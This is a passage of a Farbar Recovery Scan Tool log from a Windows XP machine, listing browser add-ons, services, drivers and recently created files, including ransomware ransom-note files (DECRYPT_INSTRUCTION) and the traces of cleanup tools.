BHO: Ad-Aware Security Toolbar -> {6c97a91e-4524-4019-86af-2aa2d567bf5c} -> C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Ad-Aware Security Toolbar - {6c97a91e-4524-4019-86af-2aa2d567bf5c} - C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
Toolbar: HKCU - &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll (Microsoft Corporation)
Toolbar: HKCU - &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll (Microsoft Corporation)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://go.microsoft.com/fwlink/?linkid=39204
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
ShellExecuteHooks: Windows Desktop Search Namespace Manager - {56F9679E-7826-4C84-81F3-532071A8BCC5} - C:\Program Files\Windows Desktop Search\MSNLNamespaceMgr.dll [304128 2009-05-24] (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 0.0.0.0
Tcpip\..\Interfaces\{44C2C7EA-F701-4F67-880D-ECFE2FE5B7BA}: [NameServer]8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{6A0C5F9A-BF17-46DE-9AC9-35267BF55774}: [NameServer]8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{96E2D96F-12B6-4E49-9218-35E42F97A477}: [NameServer]8.8.8.8,8.8.8.8
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @real.com/nppl3260;version=16.0.0.282 -> c:\program files\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.0.282 -> c:\program files\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin: @Skype Technologies S.A..com/Skype Web Plugin -> C:\Program Files\SkypeWebPlugin\npSkypeWebPlugin.dll (Skype)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2012-08-22]
FF HKLM\...\Firefox\Extensions: [{34712C68-7391-4c47-94F3-8F88D49AD632}] - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-01-02]
 
Chrome: 
=======
CHR HomePage: hxxp://www.google.co.uk/
CHR StartupUrls: "https://www.google.co.uk/"
CHR Plugin: (Widevine Content Decryption Module) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\WidevineCDM\1.4.2.464\_platform_specific\win_x86\widevinecdmadapter.dll No File
CHR Plugin: (Shockwave Flash) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\pdf.dll ()
CHR Plugin: (Microsoft® DRM) - C:\Program Files\Windows Media Player\npdrmv2.dll (Microsoft Corporation)
CHR Plugin: (Windows Media Player Plug-in Dynamic Link Library) - C:\Program Files\Windows Media Player\npdsplay.dll (Microsoft Corporation (written by Digital Renaissance Inc.))
CHR Plugin: (Microsoft® DRM) - C:\Program Files\Windows Media Player\npwmsdrm.dll (Microsoft Corporation)
CHR Plugin: (RealNetworks RealDownloader Chrome Background Extension Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
CHR Plugin: (RealNetworks RealDownloader HTML5VideoShim Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
CHR Plugin: (RealNetworks RealDownloader PepperFlashVideoShim Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
CHR Plugin: (RealDownloader Plugin) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
CHR Plugin: (Citrix Online Web Deployment Plugin 1.0.0.104) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
CHR Plugin: (Facebook Video Calling Plugin) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Facebook\Video\Skype\npFacebookVideoCalling.dll No File
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~1\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.550.13) - C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java Platform SE 7 U55) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Windows Presentation Foundation) - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Plugin: (RealPlayer G2 LiveConnect-Enabled Plug-In (32-bit) ) - c:\program files\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
CHR Plugin: (RealPlayer Download Plugin) - c:\program files\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-27]
CHR Extension: (AdBlock) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-07-24]
CHR Extension: (Pin It Button) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic [2013-05-24]
CHR Extension: (Lavasoft SecureSearch) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jjjgoniibiigbcfeipbhfcconfgmgmkc [2014-08-05]
CHR Extension: (Save to Pocket) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\niloccemoadcdkdjlinkgdfekeahmflj [2013-10-23]
CHR Extension: (Google Wallet) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-28]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2012-11-29]
CHR HKCU\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\DOCUME~1\KONSTA~1\LOCALS~1\APPLIC~1\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [2012-11-29]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 BAsfIpM; C:\WINDOWS\system32\basfipm.exe [77824 2003-02-06] (Broadcom Corp.) [File not signed]
S2 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182696 2014-03-17] (Oracle Corporation)
S2 LavasoftAdAwareService11; C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe [655352 2014-06-03] ()
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [11552 2012-03-26] (Microsoft Corporation)
S2 PEVSystemStart; C:\ComboFix\SWREG.3XE [518144 2000-08-31] (SteelWerX) [File not signed]
S2 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [38608 2012-11-29] ()
S2 wltrysvc; C:\WINDOWS\System32\bcmwltry.exe [1200128 2005-12-19] (Dell Inc.) [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 BASFND; C:\WINDOWS\system32\Drivers\BASFND.sys [6057 2002-03-13] (Broadcom Corporation) [File not signed]
S3 BCM43XX; C:\WINDOWS\System32\DRIVERS\bcmwl5.sys [424448 2006-12-18] (Broadcom Corporation)
S3 GTICARD; C:\WINDOWS\System32\DRIVERS\gticard.sys [59328 2003-02-06] (Texas Instruments)
S3 HSFHWICH; C:\WINDOWS\System32\DRIVERS\HSFHWICH.sys [208384 2005-05-03] (Conexant Systems, Inc.)
S3 HSF_DPV; C:\WINDOWS\System32\DRIVERS\HSF_DPV.SYS [1033728 2005-05-03] (Conexant Systems, Inc.)
S0 MpFilter; C:\WINDOWS\System32\DRIVERS\MpFilter.sys [171064 2012-03-20] (Microsoft Corporation)
S3 STAC97; C:\WINDOWS\System32\drivers\STAC97.sys [264440 2004-11-15] (SigmaTel, Inc.)
R3 tiumfwl; C:\WINDOWS\System32\drivers\tiumfwl.sys [42060 2003-02-14] (Texas Instruments Inc.)
S3 Trufos; C:\WINDOWS\System32\DRIVERS\Trufos.sys [360376 2014-04-22] (BitDefender S.R.L.)
S3 vrvd5; C:\WINDOWS\System32\DRIVERS\vrvd5.sys [11296 2014-06-16] (Rsupport Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-07 16:23 - 2014-08-07 16:26 - 00000000 ___SD () C:\ComboFix
2014-08-07 12:13 - 2014-08-07 12:13 - 00000000 _RSHD () C:\cmdcons
2014-08-07 12:13 - 2004-08-03 23:00 - 00260272 __RSH () C:\cmldr
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\Qoobox
2014-08-07 12:08 - 2011-06-26 07:45 - 00256000 _____ () C:\WINDOWS\PEV.exe
2014-08-07 12:08 - 2010-11-07 18:20 - 00208896 _____ () C:\WINDOWS\MBR.exe
2014-08-07 12:08 - 2009-04-20 05:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00212480 _____ (SteelWerX) C:\WINDOWS\SWXCACLS.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00098816 _____ () C:\WINDOWS\sed.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00080412 _____ () C:\WINDOWS\grep.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00068096 _____ () C:\WINDOWS\zip.exe
2014-08-07 11:41 - 2014-08-07 11:42 - 05568206 ____R (Swearware) C:\Documents and Settings\Konstantine Trivizas\Desktop\ComboFix.exe
2014-08-06 16:31 - 2014-08-06 16:32 - 00044049 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Addition.txt
2014-08-06 16:26 - 2014-08-07 17:20 - 00015839 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST.txt
2014-08-06 14:37 - 2014-08-06 14:38 - 01084928 _____ (Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
2014-08-06 13:51 - 2014-08-07 17:19 - 00000000 ____D () C:\FRST
2014-08-05 16:15 - 2014-08-05 16:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Lavasoft
2014-08-05 15:43 - 2014-08-07 14:31 - 00002028 _____ () C:\Documents and Settings\All Users\Desktop\Ad-Aware Antivirus.lnk
2014-08-05 15:43 - 2014-08-05 15:43 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Ad-Aware Antivirus
2014-08-05 15:35 - 2014-08-07 14:31 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Ad-Aware Browsing Protection
2014-08-05 15:35 - 2014-08-05 17:15 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Search Protection
2014-08-05 15:35 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\adawarebp
2014-08-05 15:34 - 2014-08-05 15:34 - 00000000 ____D () C:\Program Files\Toolbar Cleaner
2014-08-05 15:33 - 2014-08-05 15:34 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\adawaretb
2014-08-05 15:28 - 2014-08-05 15:28 - 00000000 ____D () C:\Program Files\Common Files\Lavasoft
2014-08-05 15:14 - 2014-08-05 15:14 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\LavasoftStatistics
2014-08-05 14:02 - 2014-08-05 15:38 - 00000000 ____D () C:\Program Files\Lavasoft
2014-08-05 13:40 - 2014-08-05 13:41 - 00001355 _____ () C:\WINDOWS\imsins.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00001083 _____ () C:\WINDOWS\netfxocm.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000425 _____ () C:\WINDOWS\MedCtrOC.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000342 _____ () C:\WINDOWS\ocmsn.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000311 _____ () C:\WINDOWS\tabletoc.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000309 _____ () C:\WINDOWS\msgsocm.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00006642 _____ () C:\WINDOWS\iis6.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00002822 _____ () C:\WINDOWS\tsoc.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00002058 _____ () C:\WINDOWS\comsetup.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00001248 _____ () C:\WINDOWS\ntdtcsetup.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00001878 _____ () C:\WINDOWS\msmqinst.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setuperr.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setupact.log
2014-08-05 13:38 - 2014-08-05 13:41 - 00006183 _____ () C:\WINDOWS\FaxSetup.log
2014-08-05 13:38 - 2014-08-05 13:41 - 00002956 _____ () C:\WINDOWS\ocgen.log
2014-08-05 13:34 - 2014-08-05 13:36 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB942288-v3$
2014-08-05 13:32 - 2014-08-05 13:41 - 00008464 _____ () C:\WINDOWS\KB942288-v3.log
2014-08-05 13:29 - 2014-08-05 13:29 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Lavasoft
2014-08-05 12:39 - 2014-08-05 15:39 - 00011803 _____ () C:\WINDOWS\setupapi.log
2014-08-04 17:11 - 2014-08-06 16:24 - 00110296 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-08-04 17:11 - 2014-08-04 17:11 - 00000777 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-04 17:11 - 2014-08-04 17:11 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-05 18:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-04 17:10 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Malwarebytes
2014-08-04 17:10 - 2014-05-12 07:26 - 00053208 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2014-08-04 17:10 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2014-08-04 17:04 - 2014-08-07 17:11 - 00032340 _____ () C:\WINDOWS\SchedLgU.Txt
2014-08-04 17:04 - 2014-08-07 14:48 - 00000215 _____ () C:\WINDOWS\wiadebug.log
2014-08-04 17:04 - 2014-08-07 14:21 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2014-08-04 17:04 - 2014-08-04 17:04 - 00000000 ____N () C:\WINDOWS\Sti_Trace.log
2014-08-04 16:59 - 2014-08-04 17:00 - 00000000 ____D () C:\WINDOWS\pss
2014-08-04 16:56 - 2014-08-07 17:11 - 00105714 _____ () C:\WINDOWS\WindowsUpdate.log
2014-08-04 16:55 - 2014-08-04 16:55 - 00000000 __SHD () C:\Documents and Settings\Administrator\IETldCache
2014-08-04 16:54 - 2014-08-04 17:02 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2014-08-04 16:54 - 2014-08-04 17:02 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Temp
2014-08-04 16:54 - 2014-08-04 17:02 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Google
2014-08-04 16:54 - 2014-08-04 16:56 - 00000000 ____D () C:\Documents and Settings\Administrator
2014-08-04 16:54 - 2014-08-04 16:54 - 00000000 ____D () C:\WINDOWS\CSC
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2013-03-21 11:16 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application DataGoogle
2014-08-04 16:54 - 2012-08-23 14:07 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft Help
2014-08-04 16:54 - 2012-08-20 19:03 - 00001599 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Remote Assistance.lnk
2014-08-04 16:54 - 2012-08-20 19:03 - 00000792 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Windows Media Player.lnk
2014-08-04 16:54 - 2012-08-20 19:03 - 00000000 ___RD () C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories
2014-08-01 14:04 - 2014-08-01 14:04 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-01 09:55 - 2014-08-01 09:55 - 00008198 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:55 - 2014-08-01 09:55 - 00004144 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:55 - 2014-08-01 09:55 - 00000274 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:51 - 2014-08-07 14:48 - 00262144 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-01 09:51 - 2014-08-01 10:14 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:43 - 2014-08-01 09:50 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-01 09:42 - 2014-08-01 09:50 - 00065536 _____ () C:\WINDOWS\system32\config\Microsof.evt
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-01 09:40 - 2014-08-01 09:42 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-01 09:40 - 2014-08-01 09:40 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-01 09:37 - 2014-08-01 09:37 - 00000000 ___HD () C:\82c2f8c
2014-07-24 20:44 - 2014-08-07 11:49 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\TEMP
2014-07-24 20:44 - 2014-07-24 21:06 - 00000000 ____D () C:\Program Files\Your Uninstaller 2008
2014-07-24 20:44 - 2014-07-24 20:44 - 00001810 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\1-Click Cleaning by Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000798 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\URSoft
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Your Uninstaller! 2008
